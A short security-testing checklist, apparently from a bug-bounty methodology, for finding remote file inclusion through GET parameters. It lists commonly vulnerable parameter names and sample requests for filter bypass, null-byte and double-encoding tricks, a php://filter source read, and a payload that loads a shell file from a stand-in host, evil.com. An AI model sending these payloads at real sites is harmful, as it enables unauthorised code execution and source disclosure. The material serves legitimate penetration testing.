Any GET endpoint that retrieves a file is a candidate to this vulnerability. Some vulnerable requests might be in an API response and not be directly reflected in the url of the website. Any parameter can be potentially vulnerable to remote file inclusion but it's worth paying particular attention to the following parameters: cat, dir, action, filename, board, date, detail, file, download, path, folder, prefix, include, page, inc, locate, show, doc, site, type, view, content, document, layout, mod, conf, directory. These are most of the steps I usually follow:

1. Test for an domain: GET ?filename=https://www.google.com
2. Check if http is filtered out with a case sensitive regexp: GET ?filename=hTtps://www.google.com
3. Check if http is filtered out with a case insensitive regexp: GET ?filename=hthttptps://www.google.com
4. Check for filter bypass: GET ?filename=https://www.google.com?page=http://evil.com/shell.txt
5. Check for null byte: GET ?filename=https://www.google.com?page=http://evil.com/shell.txt%00
6. Check for encoding: GET ?filename=https:%2f%2fwww.google.com
7. Check for double encoding: GET ?filename=https:%252f%252fwww.google.com
8. Search for filters (example for PHP files only):

   http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php